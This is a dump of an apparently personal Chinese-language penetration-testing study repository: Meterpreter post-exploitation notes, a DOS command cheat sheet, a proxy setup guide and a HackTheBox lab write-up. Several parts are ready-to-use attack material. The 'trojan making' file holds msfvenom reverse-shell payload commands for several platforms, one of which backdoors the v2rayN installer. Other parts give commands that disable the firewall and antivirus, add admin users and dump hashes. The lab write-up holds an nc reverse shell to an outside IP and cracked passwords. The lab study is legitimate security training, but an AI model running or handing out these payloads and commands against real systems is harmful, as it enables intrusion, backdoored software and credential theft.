 62 | 
 63 | - Hashdump
 64 | - Run post/windows/gather/smart_hashdump
 65 | - 检查权限和系统类型
 66 | - 检查是否是域控制器
 67 | - 从注册表读取hash、注入LSASS进程
 68 | - 如果是08server并具有管理员权限，直接getsystem尝试提权
 69 | - 如果是win7且UAC关闭并具有管理员权限，从注册表读取
 70 | - 03/xp直接getsystem,从注册表获取hash
 71 | 
 72 | Hash传递(直接用hash密文登录，前提是关闭了UAC)
 73 | - Pasexec: exploit/windows/smb/psexec
 74 | 
 75 | 
 76 | # 关闭防火墙及杀毒软件
 77 | > 关闭防火墙
 78 | - Netsh advfirewall set allprofiles state off (管理员及以上权限)
 79 | 
 80 | > 关闭Denfender
 81 | - Net stop windefend
 82 | 
 83 | > 关闭DEP
 84 | - Bcdedit.exe /set{current} nx AlwaysOff
 85 | 
 86 | > 关闭杀毒软件
 87 | - Run killav
 88 | - Run post/windwos/manage/killava
 89 | 
 90 | # 远程桌面
 91 | 
 92 | >开启远程桌面
 93 | - run post/windows/manage/enable_rdp
 94 | - run getgui -e
 95 | 
 96 | > 开启远程桌面并添加一个新用户bean:
 97 | - run getgui -u bean -p ean
 98 | 
 99 | >开启远程桌面并绑定在8888端口：
100 | - run getgui -e -f 8888
101 | 
102 | >截图
103 | - load espia
104 | - screengrab
105 | 
106 | # 令牌假冒
107 | 
108 | 什么是令牌假冒？
109 | > 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所谓的令牌：例如当一个用户登录系统，则它会被赋予一个访问令牌作为认证信息。 所以当一个攻击者需要域管理员的操作权限时候，需要通过假冒令牌方式进行入侵攻击。
110 | 
111 | > windows安全相关概念
112 | - session
113 | - windows station
114 | - Desktop
115 | - Login Session:不同账号登录产生不同的登录Session,代表不同的账号权限
116 | 
117 | 
118 | >Tokens简介
119 | - 与进程相关联，进程创建时根据LoginSession分配对应Token，含有该进程用户账号、组信息、权限信息等
120 | - 用户每次登录，产生LoginSession分配对应Token
121 | - 访问资源时提交Token进行身份验证，类似于web cookie
122 | - Delegate Token：交互登录会话
123 | - Impersonate Token：非交互登录会话
124 | 
125 | 
126 | 
127 | > Incognito
128 | - 独立软件，被继承到msf的meterpreter中
129 | - 不用获取账号密码窃取token将自己伪装成合法用户
130 | - 适用于域环境下提权渗透多操作系统
131 | 
132 | 
133 | # 跳板攻击
134 | > Pivoting
135 | - 利用已经被入侵的主机作为跳板来攻击网络中的其他系统
136 | - 访问由于路由问题而不能直接访问的内网系统
137 | 
138 | > 自动路由
139 | - run autoroute -s 192.168.102.0/24
140 | - run post/multi/manage/autoroute
141 | - 利用win7攻击内网服务器
142 | - 扫描内网网络
143 | 1. run post/windows/gather/arp_scanner rhosts=192.168.102.0/24   (扫描该网段活跃主机)
144 | 2. use auxiliary/scanner/portscan/tcp   （扫描目标内网主机开放的端口）
145 | 
146 | 
147 | # 代理设置
148 | > socket代理
149 | - auxiliary/server/socks4a
150 | 
151 | > ProxyChains
152 | - ProxyChains是为GNU/linux操作系统开发的工具。任何tcp连接都可以通过tor或者soxket4,socket5,http/https路由到目的地、在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式，诸如用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。
153 | - proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse <IP>
154 | 
155 | 
156 | 看到第13


--------------------------------------------------------------------------------
/杂七杂八/参考资料/Attacking Active Directory_ 0 to 0.9 _ zer1t0.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/参考资料/Attacking Active Directory_ 0 to 0.9 _ zer1t0.pdf


--------------------------------------------------------------------------------
/杂七杂八/参考资料/OSCP Web专题方法论.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/参考资料/OSCP Web专题方法论.pdf


--------------------------------------------------------------------------------
/杂七杂八/参考资料/OSCP方法论.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/参考资料/OSCP方法论.pdf


--------------------------------------------------------------------------------
/杂七杂八/参考资料/域渗透一条龙.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/杂七杂八/参考资料/域渗透一条龙.pdf


--------------------------------------------------------------------------------
/杂七杂八/如何用IPLC加速连接offsec Lab网络.md:
--------------------------------------------------------------------------------
 1 | # 免责声明
 2 | > 本文使用的工具和方法仅限学习交流使用，请不要将文中使用的工具和思路用于任何非法用途，对此产生的一切后果，本人不承担任何责任，也不对造成的任何误用或损害负责
 3 | 
 4 | # 为什么需要IPLC
 5 | 
 6 | 最近在使用offsec的lab时发现网络巨卡，连接offsec数据中心（英国）的网络延迟平均在300ms左右，开个RDP基本上就是ppt，没法玩。我在南方城市独享一条电信的千兆网络，讲道理这个延迟我不是很认可。而且我之前打OSCP的lab时网络（数据中心在美国）是非常顺畅的，不知道英国这个节点为什么这么坑，然后我们还不能自己选择节点，因此需要另外研究一套网络解决方案。
 7 | 
 8 | 需要注意，如果你对网络速度需求不敏感是不需要IPLC的,普通v2ray基本可以满足需求。
 9 | 
10 | # 可选方案
11 | 
12 | 第一种是用vps做一个中转机器，然后在openvpn里做一个前置代理，优点是简单，自己搭个vps就行，我打cp时用的是这种，缺点还是要过公网以及GFW，而GFW这个东西大家都知道就是网络大姨妈，会给我们网络的使用带来很多不确定性。
13 | 
14 | 第二种是走IPLC，IPLC 是 International Private Leased Circuit 的缩写，中文翻译是国际私用出租线路，理论上不用过GFW,而且是私有路线，不用走公网。我理解就是你去长隆乐园玩买的那个快速通道，可以省很多排队的时间。下面是我偷的一个网络上的概念图。
15 | 
16 | 
17 | 
18 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681831089636.jpg)
19 | 
20 | 
21 | 很明显，IPLC的优点就是快，而缺点就是贵，我买的套餐是49元一个月。
22 | 
23 | # 如何在kali Linux中使用IPLC？
24 | 
25 | windows和手机使用IPLC非常简单，直接下载软件打开订阅即可，这里不再赘述，主要说明如何在kali中使用。
26 | 
27 | 1. 首先要租用一个IPLC服务，我使用的是WgetCloud，可以点击[这里](https://invite.wgetcloud.ltd/auth/register?code=i37y)注册，你也可以使用其他家的服务，这里不做广告。
28 | 
29 | 需要注意，IPLC线路的选择最好根据自己网络所在地就近选择，比如你在北方，那就选择日韩线路，在南方，选择香港，新加坡线路。请自己甄别各个服务商提供有哪些节点。
30 | 
31 | 2. 下载一个[clash](https://github.com/Dreamacro/clash/releases/tag/premium)
32 | 
33 | 关于clash的详细使用教程请查阅其他文章资料，这里单单示范如何连接offsec的vpn
34 | 
35 | 第一次执行会在```~/.config/clash/```生成两个文件
36 | ```
37 | ┌──(root㉿kali)-[~]
38 | └─# ./clash-linux-amd64                       
39 | 11:30:55 INF [Config] can't find config, create a initial config file path=/root/.config/clash/config.yaml
40 | 11:30:55 INF [MMDB] can't find DB, start download path=/root/.config/clash/Country.mmdb
41 | 
42 | ```
43 | 
44 | 
45 | 来到```~/.config/clash/```目录，执行
46 | 
47 | 
48 | ```
49 | wget -O config.yaml '你的IPLC订阅地址'
50 | ```
51 | 
52 | 下载[Country.mmdb](https://github.com/Dreamacro/maxmind-geoip/releases/latest/download/Country.mmdb)覆盖到```~/.config/clash/```目录
53 | 
54 | 
55 | 再次执行，已连接上服务
56 | ```
57 | ./clash-linux-amd64
58 | ```
59 | 
60 | 
61 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681832433238.png)
62 | 
63 | 
64 | 查看config.yaml文件，里面有相关服务的端口配置
65 | 
66 | 
67 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681832588697.png)
68 | 
69 | 
70 | 给kali的firefox配置，需要FoxyProxy插件
71 | 
72 | 
73 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681832687815.png)
74 | 
75 | 测试谷歌，没有任何问题
76 | 
77 | 
78 | 
79 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681832754502.png)
80 | 
81 | 设置openvpn,加一行
82 | 
83 | ```
84 | socks-proxy 127.0.0.1 7891
85 | ```
86 | 
87 | 
88 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681832856739.png)
89 | 
90 | 
91 | 现在可以使用IPLC加速网络了，我个人体验速度提升还是非常可观的，开RDP服务的时候不会再卡了。
92 | 
93 | 
94 | 
95 | ![img](https://github.com/maxzxc0110/hack-study/blob/main/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/img/1681833225045.png)


--------------------------------------------------------------------------------
/杂七杂八/常用dos.txt:
--------------------------------------------------------------------------------
  1 | 查看局域网内所有ip：
  2 | for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.0.%i
  3 | 然后：
  4 | arp -a
  5 | 
  6 | 
  7 | 
  8 | 常用的dos命令
  9 | 
 10 | color　　改变cmd颜色
 11 | 
 12 | ping -t -l 65550 ip　　死亡之ping（发送大于62K的文件并一直ping目标IP简称死亡之ping）
 13 | 
 14 | ipconfig　　查看IP
 15 | 
 16 | ipconfig /release　　释放IP
 17 | 
 18 | ipconfig /renew　　重新获得IP
 19 | 
 20 | systeminfo　　查看系统信息，比如可以看到系统安装了哪些补丁，可以利用补丁进行提权
 21 | 
 22 | arp -a　　查看主机IP和对应的物理地址，局域网通信是基于arp协议，也就是物理地址通信，所以入宫知道对方的主机物理地址就可用于内网欺骗
 23 | 
 24 | net view　　查看局域网内其他计算机的名称
 25 | 
 26 | shutdown -s -t 180 -c “你被黑了，系统马上关机”　　系统关机并显示：你被黑了，系统马上关机，shutdown -a为取消
 27 | 
 28 | dir　　产看目录
 29 | 
 30 | （dir -a　　可以查看隐藏文件）
 31 | 
 32 | cd　　切换目录
 33 | 
 34 | （cd ..　　切换到父目录（上一层目录）
 35 | 
 36 | 　d:　　进入D盘）
 37 | 
 38 | start www.baidu.com　　打开网页
 39 | 
 40 | start 123.txt 　　打开文件123.txt
 41 | 
 42 | copy con c:\123.txt　　创建123.txt文件，并可写入内容，按ctrl+c可退出编写
 43 | 
 44 | （notepad　123.txt　　用记事本查看刚刚创建的123.txt文件内容
 45 | 
 46 | 　type　123.txt　　在终端显示文件123.txt里的内容）
 47 | 
 48 | ctrl +z　　回车
 49 | 
 50 | md　目录名　　创建目录
 51 | 
 52 | rd　123　　删除文件夹
 53 | 
 54 | ren　原文件名　新文件名　　　重命名文件名
 55 | 
 56 | del　123.txt　　　删除123.txt文件
 57 | 
 58 | copy　　复制文件
 59 | 
 60 | move　　移动文件
 61 | 
 62 | tree　　树形列出文件夹结构
 63 | 
 64 | telnet
 65 | 
 66 | net use k:\\192.168.1.1\c$
 67 | 
 68 | net　use　k:\\192.168.1.1\c$/del
 69 | 
 70 | net　start　　查看开启了哪些服务
 71 | 
 72 | net　start　服务名　　开启服务，如net　start　telnet，net　start　schedule
 73 | 
 74 | net　stop　服务名　　停止某服务
 75 | 
 76 | cls　　清屏
 77 | 
 78 | net user 用户 密码 /add　　建立用户
 79 | 
 80 | net user guest /active:yes 　　激活guest用户
 81 | 
 82 | net user 　　查看有哪些用户
 83 | 
 84 | net user 账户名　　查看账户的属性
 85 | 
 86 | net localgroup administrators 用户名 /add　　把用户添加到管理员组，使其具有管理员权限，注意：administrator后加s用复数
 87 | 
 88 | net user guest 12345　　用guest用户登录后将密码改为12345
 89 | 
 90 | net password 密码　　更改系统登录密码
 91 | 
 92 | net share 　　查看本地开启的共享
 93 | 
 94 | net share ipc$　　开启ip$共享
 95 | 
 96 | net share ipc$ /del　　删除ipc$共享
 97 | 
 98 | net share c$ /del 　　　删除c：共享
 99 | 
100 | netstat -a 　　查看开启了哪些端口，常用netstat -an
101 | 
102 | netstat -n　　查看端口的网络连接情况，常用netstat -an
103 | 
104 | netstat -v　　查看正在进行的工作
105 | 
106 | netsh　　网络工具
107 | 
108 | at id号　　开启已注册的某个计划任务
109 | 
110 | at /delete　　停止所有计划任务，用参数/yes则不需要确认就停止
111 | 
112 | at　　查看所有的计划任务
113 | 
114 | tasklist　　　查看所以进程（taskkill /f /im qq.exe　　结束qq进程）
115 | 
116 | attrib　文件名（目录名）　　查看某文件（目录）的属性
117 | 
118 | attrib 文件名 -A -R -S -H 或+A +R +S +H　　去掉（添加）某文件的存档，只读，系统，隐藏属性；用+则是添加为某属性
119 | 
120 | msg 用户名 需要发送的信息　　给用户发送信息
121 | 
122 | 
123 | 
124 | 


--------------------------------------------------------------------------------
/杂七杂八/木马制作.txt:
--------------------------------------------------------------------------------
  1 | 解决rev shell下中文乱码问题，cmd下输入
  2 | ```
  3 | chcp 65001
  4 | ```
  5 | 
  6 | 编译一次：
  7 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.92  lport=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/1.exe
  8 | 
  9 | 
 10 | 编译两次：
 11 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.92 lport=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/2.exe
 12 | 
 13 | 
 14 | 
 15 | 监听：
 16 | 在MSF上启动handler开始监听后门程序
 17 | 1，use exploit/multi/handler 
 18 | 2，set playload windows/meterpreter/reverse_tcp
 19 | 
 20 | 
 21 | 解决linux连接windows电脑中文乱码问题：
 22 | 在目标dos上输入：
 23 | chcp 65001
 24 | 
 25 | 
 26 | 
 27 | 在软件上加后门：
 28 | 
 29 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 lport=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x v2rayN.exe -f exe -o /var/www/html/v2rayN2.exe
 30 | 
 31 | 
 32 | 
 33 | 生成linux下的可执行木马程序：
 34 | msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.107 lport=4444 -b "\x00"  -i 10 -f elf -o /var/www/html/demo
 35 | 
 36 | (注意，因为生成时指定的payload是：linux/x64/meterpreter/reverse_tcp，所以在msf监听时也要指定这个payload，否则会报错)
 37 | 
 38 | 
 39 | 生成mac下的木马程序
 40 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.107 lport=4444 -f macho > shell.macho
 41 | 
 42 | 
 43 | 
 44 | msfvenom -l        列出所有模块，攻击载荷
 45 | 
 46 | Binaries
 47 | 
 48 | linux
 49 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
 50 | 
 51 | Windows
 52 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
 53 | 
 54 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell64.exe
 55 | 
 56 | Mac
 57 | msfvenom -p osx/x86ell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
 58 | 
 59 | 
 60 | 
 61 | Web Payloads
 62 | 
 63 | PHP
 64 | msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
 65 | 
 66 | ASP
 67 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
 68 | 
 69 | JSP
 70 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp  
 71 | 
 72 | WAR
 73 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
 74 | Scripting Payloads  
 75 | 
 76 | Python
 77 | msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py  
 78 | 
 79 | Bash
 80 | msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh 
 81 | 
 82 | Perl
 83 | msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
 84 | 
 85 | 
 86 | 
 87 | 
 88 | Shellcode
 89 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
 90 | 
 91 | Linux Based Shellcode
 92 | 
 93 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
 94 | 
 95 | Windows Based Shellcode
 96 | 
 97 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
 98 | 
 99 | Mac Based Shellcode
100 | 
101 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
102 | 
103 | 


--------------------------------------------------------------------------------
/靶场/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/.DS_Store


--------------------------------------------------------------------------------
/靶场/HTB/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/.DS_Store


--------------------------------------------------------------------------------
/靶场/HTB/Blazorized.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Blazorized.md


--------------------------------------------------------------------------------
/靶场/HTB/Blurry_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Blurry_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/BoardLight_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/BoardLight_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/BoardLight_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/BoardLight_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/BoardLight_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/BoardLight_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Broker_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Broker_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Compiled_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Compiled_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Compiled_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Compiled_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/10.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/10.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/11.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/11.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/12.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/12.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/5.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/6.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/7.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/8.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Editorial_files/9.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Editorial_files/9.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn.md:
--------------------------------------------------------------------------------
  1 | # 服务
  2 | ```
  3 | ┌──(root㉿kali)-[~]
  4 | └─# nmap -Pn -p- 10.10.11.25   
  5 | Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-22 05:01 EDT
  6 | Stats: 0:16:20 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
  7 | SYN Stealth Scan Timing: About 66.59% done; ETC: 05:25 (0:08:12 remaining)
  8 | Stats: 0:28:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
  9 | SYN Stealth Scan Timing: About 95.55% done; ETC: 05:31 (0:01:19 remaining)
 10 | Nmap scan report for greenhorn.htb (10.10.11.25)
 11 | Host is up (0.43s latency).
 12 | Not shown: 65452 closed tcp ports (reset), 61 filtered tcp ports (host-unreach), 19 filtered tcp ports (no-response)
 13 | PORT     STATE SERVICE
 14 | 22/tcp   open  ssh
 15 | 80/tcp   open  http
 16 | 3000/tcp open  ppp
 17 | 
 18 | Nmap done: 1 IP address (1 host up) scanned in 1808.90 seconds
 19 | 
 20 | 
 21 | ```
 22 | 
 23 | 写host
 24 | ```
 25 | echo "10.10.11.25 greenhorn.htb" >> /etc/hosts
 26 | ```
 27 | 
 28 | ![](GreenHorn_files/1.jpg)
 29 | 
 30 | 这个页面暴露出软件版本：pluck 4.7.18
 31 | 
 32 | 
 33 | 使用[CVE-2023-50564](https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC)
 34 | 
 35 | 修改
 36 | 
 37 | shell.php
 38 | ![](GreenHorn_files/2.jpg)
 39 | 
 40 | poc.py
 41 | ![](GreenHorn_files/3.jpg)
 42 | 
 43 | 拿到shell
 44 | 
 45 | ![](GreenHorn_files/4.jpg)
 46 | 
 47 | 
 48 | ZIP file path: ```/root/htb/GreenHorn/CVE-2023-50564_Pluck-v4.7.18_PoC-main/shell.zip```
 49 | 
 50 | tty，返回一个稳定shell
 51 | ```
 52 | /bin/sh -i
 53 | 
 54 | rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 443 >/tmp/f
 55 | ```
 56 | 
 57 | 找到一个密码：
 58 | ```
 59 | cat /var/www/html/pluck/data/inc/functions.admin.php | grep password
 60 | 
 61 | $ cd /var/www/html/pluck/data/
 62 | $ cd settings
 63 | $ cat pass.php
 64 | $ <?php
 65 | $ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
 66 | ?>
 67 | ```
 68 | 
 69 | 拿去在线解密是：iloveyou1
 70 | 
 71 | 
 72 | 就是用户junior的密码：
 73 | ```
 74 | $ su junior
 75 | Password: iloveyou1
 76 | id
 77 | uid=1000(junior) gid=1000(junior) groups=1000(junior)
 78 | 
 79 | ```
 80 | 
 81 | 传输桌面的Using OpenVAS.pdf文件
 82 | ```
 83 | nc -lvp 139 > 'Using OpenVAS.pdf'
 84 | nc 10.10.16.19 139 < 'Using OpenVAS.pdf'
 85 | ```
 86 | 
 87 | 机器安装了OpenVAS
 88 | 
 89 | ![](GreenHorn_files/5.jpg)
 90 | 
 91 | 
 92 | 尝试执行
 93 | ```
 94 | junior@greenhorn:~$ sudo /usr/sbin/openvas
 95 | sudo /usr/sbin/openvas
 96 | [sudo] password for junior: iloveyou1
 97 | 
 98 | junior is not in the sudoers file.  This incident will be reported.
 99 | junior@greenhorn:~$ 
100 | 
101 | ```
102 | 
103 | 
104 | # 提权
105 | 
106 | 提取pdf里被遮挡的密码图片
107 | ```
108 | pdfimages "./Using OpenVAS.pdf" greenhorn
109 | ```
110 | 
111 | 使用[Depix](https://github.com/spipm/Depix)这个项目
112 | 
113 | 执行：
114 | ```
115 | python3 depix.py \
116 | -p /root/htb/GreenHorn/greenhorn-000.ppm \
117 | -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png \
118 | -o /root/htb/GreenHorn/output0.png
119 | 
120 | ```
121 | 
122 | ![](GreenHorn_files/6.jpg)
123 | 
124 | 得到明文：
125 | 
126 | ![](GreenHorn_files/7.jpg)
127 | 
128 | 注意密码要去掉空格：sidefromsidetheothersidesidefromsidetheotherside
129 | 
130 | 
131 | ```
132 | $ su root
133 | Password: sidefromsidetheothersidesidefromsidetheotherside
134 | shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
135 | id
136 | uid=0(root) gid=0(root) groups=0(root)
137 | 
138 | ```


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/5.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/6.jpg


--------------------------------------------------------------------------------
/靶场/HTB/GreenHorn_files/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/GreenHorn_files/7.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Headless_files/1.jpg:
--------------------------------------------------------------------------------
